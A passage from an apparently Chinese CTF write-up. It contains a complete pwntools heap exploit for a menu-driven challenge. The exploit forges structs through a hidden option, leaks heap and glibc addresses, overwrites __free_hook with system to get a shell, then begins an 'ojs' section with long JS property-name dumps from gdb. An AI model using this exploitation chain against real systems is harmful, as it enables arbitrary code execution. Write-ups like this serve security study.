    sh.sendlineafter(menu_prompt, str(idx))

def push(size):
    """Menu 1: append a new node with a `size`-byte data buffer."""
    choice(1)
    answer = lambda prompt, value: sh.sendlineafter(prompt, str(value))
    answer("Size: ", size)

def change(idx, value_idx, value):
    """Menu 2: set byte `value_idx` of node `idx`'s data to the integer `value`."""
    choice(2)
    answers = (("Index: ", idx), ("Value idx: ", value_idx), ("Value: ", value))
    for prompt, val in answers:
        sh.sendlineafter(prompt, str(val))

def show(idx, num):
    """Menu 3: print `num` bytes of node `idx` (one hex value per line; see get_show)."""
    choice(3)
    for prompt, val in (("Index: ", idx), ("Num: ", num)):
        sh.sendlineafter(prompt, str(val))

def pop():
    """Menu 4 without an index: remove (free) the head node of the queue."""
    POP_OPTION = 4
    choice(POP_OPTION)

def delete(idx):
    """Menu 4 followed by an index. Not used by this exploit (pop() is)."""
    choice(4)
    index_prompt = "Index: "
    sh.sendlineafter(index_prompt, str(idx))

def edit(idx, offset, data):
    """Write the string `data` into node `idx` starting at byte `offset`, via change()."""
    for pos, ch in enumerate(data, offset):
        change(idx, pos, ord(ch))

def backdoor(idx, content):
    """Hidden option 666: overwrite the node struct of index `idx` with raw `content`.

    This is the primitive everything else is built on: the struct holds the
    data pointer and size that show()/change() trust.
    """
    choice(666)
    index_prompt, content_prompt = "Index: ", "Content: "
    sh.sendlineafter(index_prompt, str(idx))
    sh.sendafter(content_prompt, content)

def get_show(size):
    """Collect the `size` hex lines printed after "Content: " by show() into a byte string."""
    sh.recvuntil('Content: ')
    chars = [chr(int(sh.recvline(), 16)) for _ in range(size)]
    return "".join(chars)

# --- heap leak -----------------------------------------------------------
# Two nodes; node 0's buffer gets "/bin/sh" (this is what system() will
# eventually receive). pop() frees the head, but the index is still usable
# through the backdoor.
push(0x100)  # 0
push(0x100)  # 1
edit(0, 0, '/bin/sh')
# edit(1, 0, 'b' * 0x100)
pop()

# Blow the size field of node 0 up to 0x1000 so show() reads past its buffer
# into neighbouring heap metadata; the last qword is a heap pointer.
backdoor(0, 'a' * 8 + p64(0x1000) + '\\x00')
show(0, 0xc0)
leak_data = get_show(0xc0)

log.hexdump(leak_data)

heap_base = u64(leak_data[-8:]) - 0x126f0
log.success("heap_base:\\t" + hex(heap_base))
# Re-point node 0 into the heap (offsets found in the debugger); the trailing
# 0xf0 only patches the low byte of the next struct field.
backdoor(0, p64(heap_base + 0x126a0) + p64(0x8) + '\\xf0')
# Four 0x110 chunks pushed and popped so freed buffers with allocator
# pointers sit at known heap offsets.
push(0x100) #1
push(0x100) #2
push(0x100) #3
push(0x100) #4
pop() #4
pop() #3
pop() #2
pop() #1

# --- libc leak -----------------------------------------------------------
# Forge a whole node struct. From how it is used, the fields look like
# (something, element size 8, data base, data base, limit, …): show() reads
# through the data pointer, so pointing it at a freed chunk returns libc
# pointers. 0x3ebca0 = unsorted-bin head in glibc 2.27.
fake_struct = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct += p64(heap_base + 0x13450) + p64(heap_base + 0x13450)
fake_struct += p64(heap_base + 0x13450 + 0x200) + p64(heap_base + 0x131b8)
fake_struct += p64(heap_base + 0x13450 + 0x100) + p64(heap_base + 0x13450)
backdoor(0, fake_struct)

show(0, 0x10)
libc_leak = get_show(0x10)
log.hexdump(libc_leak)
libc_base = u64(libc_leak[-8:]) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))

free_hook_addr = libc_base + 0x3ed8e8
system_addr = libc_base + 0x4f420
bin_sh_addr = libc_base + 0x1b3d88   # unused: "/bin/sh" lives in node 0's buffer

# --- __free_hook -> system ----------------------------------------------
# Same forged struct, data pointer now at __free_hook; change() then writes
# system's address there byte by byte.
fake_struct2 = p64(heap_base + 0x131a0) + p64(0x8)
fake_struct2 += p64(free_hook_addr) + p64(free_hook_addr)
fake_struct2 += p64(free_hook_addr + 0x200) + p64(heap_base + 0x131b8)
fake_struct2 += p64(free_hook_addr + 0x100) + p64(free_hook_addr)
backdoor(0, fake_struct2)

edit(0, 0, p64(system_addr))
#gdb.attach(sh, "b free")
# pop() frees the head node's buffer -> free(ptr) is now system(ptr); the
# buffer presumably still starts with "/bin/sh" (written at the top).
pop()

sh.interactive()

ojs

根据字符串内容找到项目地址:https://github.com/ndreynolds/flathead

编译一份源码,然后用 gdb 的 dprintf 调试程序,输出所有的 prop,再编写程序进行比对。

a = '''prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:create
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperties
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyDescriptor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:keys
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyNames
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:preventExtensions
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isExtensible
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:seal
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isSealed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:freeze
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFrozen
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:hasOwnProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:propertyIsEnumerable
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Object
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:prototype
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:apply
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:bind
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:call
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isGenerator
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:Function
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isArray
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pop
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:push
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reverse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:shift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sort
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:splice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:unshift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:join
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:filter
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:forEach
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:every
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:map
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:some
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduce
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduceRight
prop:Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:fromCharCode
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charTo
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charCodeAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:localeCompare
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:match
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:replace
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:search
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:split
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substr
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substring
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trim
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimLeft
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimRight
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:String
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:MAX_VALUE
prop:MIN_VALUE
prop:NEGATIVE_INFINITY
prop:POSITIVE_INFINITY
prop:NaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toExponential
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toFixed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toPrecision
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Number
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Boolean
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:now
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:UTC
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isDST
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTimezoneOffset
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toGMTString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toISOString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toJSON
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUTCString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Date
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:global
prop:ignoreCase
prop:lastIndex
prop:multiline
prop:length
prop:source
prop:sticky
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exec
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:test
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:RegExp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:name
prop:length
prop:message
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:EvalError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:RangeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:ReferenceError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:SyntaxError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:TypeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:URIError
prop:Error
prop:E
prop:LN2
prop:LN10
prop:LOG2E
prop:LOG10E
prop:PI
prop:M_PI_2
prop:M_PI_4
prop:M_1_PI
prop:M_2_PI
prop:M_2_SQRTPI
prop:SQRT1_2
prop:SQRT2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:abs
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:acos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:asin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:ceil
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:cos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:floor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:max
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:min
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pow
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:random
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:round
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sqrt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:tan
prop:Math
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:error
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:assert
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:time
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:timeEnd
prop:console
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:run
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:spy
prop:gc
prop:NaN
prop:Infinity
prop:undefined
prop:this
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float64Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isNaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFinite
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseInt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseFloat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:eval'''

b = '''prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:create
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperties
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyDescriptor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:keys
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyNames
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:preventExtensions
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isExtensible
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:seal
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isSealed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:freeze
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFrozen
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:hasOwnProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:propertyIsEnumerable
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Object
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:prototype
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:apply
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:bind
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:call
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isGenerator
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:Function
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isArray
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pop
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:push
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reverse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:shift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sort
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:splice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:unshift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:join
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:filter
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:forEach
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:every
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:map
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:some
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduce
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduceRight
prop:Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:fromCharCode
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charCodeAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:localeCompare
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:match
prop:prototype
prop:length
prop:name
prop:arguments
